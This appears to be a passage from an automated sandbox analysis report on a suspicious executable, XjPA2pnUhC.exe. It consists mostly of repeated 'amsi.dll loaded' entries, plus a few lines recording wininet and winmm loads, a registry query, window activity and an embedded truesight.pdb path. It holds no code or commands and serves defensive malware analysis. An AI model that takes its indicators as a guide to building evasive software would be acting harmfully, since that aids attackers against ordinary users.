                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: XjPA2pnUhC.exeStatic file information: File size 1088512 > 1048576
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
